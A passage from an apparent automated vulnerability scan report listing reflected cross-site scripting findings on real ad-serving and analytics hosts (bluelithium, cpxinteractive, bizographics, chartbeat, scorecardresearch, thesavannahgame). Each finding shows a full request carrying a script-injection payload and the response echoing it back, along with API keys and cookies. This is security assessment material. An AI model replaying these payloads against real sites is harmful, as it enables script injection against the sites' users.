Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:50 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:49:50 GMT
Pragma: no-cache
Content-Length: 4667
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?Z=1x1&fb233"-alert(1)-"19d71a463a=1&s=2377409&_salt=3393856248";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...

2.7. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 595b1"><script>alert(1)</script>d3f03646bfa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=2377409&595b1"><script>alert(1)</script>d3f03646bfa=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:49 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:49:49 GMT
Pragma: no-cache
Content-Length: 4715
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ads.bluelithium.com/imageclick?595b1"><script>alert(1)</script>d3f03646bfa=1&Z=1x1&s=2377409&_salt=4008406020&t=2" target="_parent">
...[SNIP]...

2.8. http://adserving.cpxinteractive.com/st [ad_size parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b423'-alert(1)-'25f6b002c06 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x05b423'-alert(1)-'25f6b002c06&section=1620509&banned_pop_types=29&pop_times=1&pop_frequency=86400 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Tue, 13-Sep-2011 12:48:56 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:48:56 GMT
Content-Length: 503

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=0x05b423'-alert(1)-'25f6b002c06&inv_code=1620509&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=86400&referrer=http://www.nowpublic.com/&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBU
...[SNIP]...

2.9. http://adserving.cpxinteractive.com/st [pop_frequency parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the pop_frequency request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8de21'-alert(1)-'54cf1ba13ce was submitted in the pop_frequency parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=1620509&banned_pop_types=29&pop_times=1&pop_frequency=864008de21'-alert(1)-'54cf1ba13ce HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Tue, 13-Sep-2011 12:49:18 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:49:18 GMT
Content-Length: 494

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1620509&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=864008de21'-alert(1)-'54cf1ba13ce&referrer=http://www.nowpublic.com/&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D1620509%26banned_pop_types%3D2
...[SNIP]...

2.10. http://adserving.cpxinteractive.com/st [pop_times parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the pop_times request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da557'-alert(1)-'2b810b2be8e was submitted in the pop_times parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=1620509&banned_pop_types=29&pop_times=1da557'-alert(1)-'2b810b2be8e&pop_frequency=86400 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Tue, 13-Sep-2011 12:49:14 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:49:14 GMT
Content-Length: 494

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1620509&media_subtypes=popunder&pop_freq_times=1da557'-alert(1)-'2b810b2be8e&pop_freq_duration=86400&referrer=http://www.nowpublic.com/&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D162050
...[SNIP]...

2.11. http://adserving.cpxinteractive.com/st [section parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f594'-alert(1)-'282e6498410 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=16205091f594'-alert(1)-'282e6498410&banned_pop_types=29&pop_times=1&pop_frequency=86400 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Tue, 13-Sep-2011 12:49:00 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:49:00 GMT
Content-Length: 494

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=16205091f594'-alert(1)-'282e6498410&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=86400&referrer=http://www.nowpublic.com/&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type
...[SNIP]...

2.12. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 93296<script>alert(1)</script>12a9537ccd was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=eff06988d5814684997ff16c58dc2e1c93296<script>alert(1)</script>12a9537ccd&callback_url=http%3A%2F%2Fdts1.raasnet.com%2Fdts%2Fbizo%2Fin HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e33; BizoData=...[SNIP]...

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 12 Sep 2011 13:06:25 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e339375522360161b3cf7c4fe7e;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 91
Connection: keep-alive

Unknown API key: (eff06988d5814684997ff16c58dc2e1c93296<script>alert(1)</script>12a9537ccd)

2.13. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload a110d<script>alert(1)</script>497df2cabeb was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=eff06988d5814684997ff16c58dc2e1c&callback_url=a110d<script>alert(1)</script>497df2cabeb HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e33; BizoData=...[SNIP]...

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 12 Sep 2011 13:06:27 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e339375522360161b3cf7c4fe7e;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: a110d<script>alert(1)</script>497df2cabeb

2.14. http://api.chartbeat.com/toppages/ [jsonp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.chartbeat.com
Path:   /toppages/

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload be0db<script>alert(1)</script>f34e1e517d7 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /toppages/?host=observer.com&jsonp=chartbeat_top_pages.cback2821356be0db<script>alert(1)</script>f34e1e517d7&apikey=e58ef8b1512d5591696ca4b8badf20b9&limit=20 HTTP/1.1
Host: api.chartbeat.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 12 Sep 2011 12:48:15 GMT
Content-Type: text/javascript
Connection: close
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 3926

chartbeat_top_pages.cback2821356be0db<script>alert(1)</script>f34e1e517d7([{"i": "MT: 0", "path": "\/", "visitors": 38}, {"i": "Morning Links: Is Paul Krugman OK? | The New York Observer", "path": "\/2011\/09\/morning-links-is-paul-krugman-ok\/", "visitors": 10}, {"i": "Cre
...[SNIP]...

2.15. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 32eb5<script>alert(1)</script>e1d9a8838e6 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=232eb5<script>alert(1)</script>e1d9a8838e6&c2=6035470&c3=&c4=/&c5=20000&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Mon, 26 Sep 2011 12:50:03 GMT
Date: Mon, 12 Sep 2011 12:50:03 GMT
Content-Length: 1240
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"232eb5<script>alert(1)</script>e1d9a8838e6", c2:"6035470", c3:"", c4:"/", c5:"20000", c6:"", c10:"", c15:"", c16:"", r:""});



2.16. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/auth/facebook/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bdm.thesavannahgame.com
Path:   /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/auth/facebook/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 8de00<script>alert(1)</script>5287633e421 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/auth/facebook/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E?verbosity=9&callback=jQuery16204978716284967959_13158497317468de00<script>alert(1)</script>5287633e421&_=1315849740224 HTTP/1.1
Host: bdm.thesavannahgame.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Mon, 12 Sep 2011 12:50:27 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_wsgi/2.5 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Vary: Authorization,Accept-Encoding,*
Content-Length: 634
Connection: keep-alive

jQuery16204978716284967959_13158497317468de00<script>alert(1)</script>5287633e421({
"content": "",
"headers": {
"Content-Type": [
"text/html; charset=utf-8"
],
"Vary": [
"Authorization"
],
"Location": [

...[SNIP]...

2.17. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/auth/facebook/status [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bdm.thesavannahgame.com
Path:   /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/auth/facebook/status

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 54cb5<script>alert(1)</script>2964cc901df was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/auth/facebook/status?verbosity=9&callback=jQuery16204978716284967959_131584973174554cb5<script>alert(1)</script>2964cc901df&_=1315849736810 HTTP/1.1
Host: bdm.thesavannahgame.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Mon, 12 Sep 2011 12:50:10 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_wsgi/2.5 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Vary: Authorization,Accept-Encoding,*
Content-Length: 435
Connection: keep-alive

jQuery16204978716284967959_131584973174554cb5<script>alert(1)</script>2964cc901df({
"content": "29",
"headers": {
"Content-Type": [
"text/html; charset=utf-8"
],
"Vary": [
"Authorization"
],
"BDM-Reason-Phrase"
...[SNIP]...

2.18. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bdm.thesavannahgame.com
Path:   /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c26c7<script>alert(1)</script>39da3c5bada was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E?verbosity=9&callback=jQuery162045605130144394934_1315850661325c26c7<script>alert(1)</script>39da3c5bada&_=1315850662055 HTTP/1.1
Host: bdm.thesavannahgame.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Mon, 12 Sep 2011 13:04:46 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_wsgi/2.5 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Vary: Authorization,Accept-Encoding,*
Content-Length: 6204
Connection: keep-alive

jQuery162045605130144394934_1315850661325c26c7<script>alert(1)</script>39da3c5bada({
"content": [
{
"read_only": 0,
"modified_timestamp": 1315831726,
"resource_name": "end_user",
"award_summaries": [],
"best_gue
...[SNIP]...

2.19. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E/named_level_collection [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bdm.thesavannahgame.com
Path:   /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E/named_level_collection

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6b724<script>alert(1)</script>5bfe554e92d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/end_user/1B3C6937-8DDC-4B7E-95C5-7878A957141E/named_level_collection?attribute_friendly_id=bdm-quest&max_records=15&completion=complete&order_by=-created&verbosity=9&callback=jQuery16204978716284967959_13158497317486b724<script>alert(1)</script>5bfe554e92d&_=1315849741737 HTTP/1.1
Host: bdm.thesavannahgame.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Mon, 12 Sep 2011 12:50:42 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_wsgi/2.5 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Vary: Authorization,Accept-Encoding,*
Content-Length: 353
Connection: keep-alive

jQuery16204978716284967959_13158497317486b724<script>alert(1)</script>5bfe554e92d({
"content": [
[],
{}
],
"headers": {
"Content-Type": [
"application/json; charset=utf-8"
],
"Vary": [
"Authorization"

...[SNIP]...

2.20. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_level_collection [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bdm.thesavannahgame.com
Path:   /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_level_collection

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c780e<script>alert(1)</script>f8f059caaeb was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_level_collection?attribute_friendly_id=bdm-quest-active&max_records=1&order_by=-relative_weight&verbosity=9&callback=jQuery16204978716284967959_1315849731747c780e<script>alert(1)</script>f8f059caaeb&_=1315849741736 HTTP/1.1
Host: bdm.thesavannahgame.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Mon, 12 Sep 2011 12:50:36 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_wsgi/2.5 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Vary: Authorization,Accept-Encoding,*
Content-Length: 22597
Connection: keep-alive

jQuery16204978716284967959_1315849731747c780e<script>alert(1)</script>f8f059caaeb({
"content": [
[
{
"end_user_description": "Learn about SavannahNow.com!",
"read_only": 0,
"modified_timestamp": 1313094859,

...[SNIP]...

2.21. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_transaction_group/657843/execute/1B3C6937-8DDC-4B7E-95C5-7878A957141E [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bdm.thesavannahgame.com
Path:   /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_transaction_group/657843/execute/1B3C6937-8DDC-4B7E-95C5-7878A957141E

Issue detail

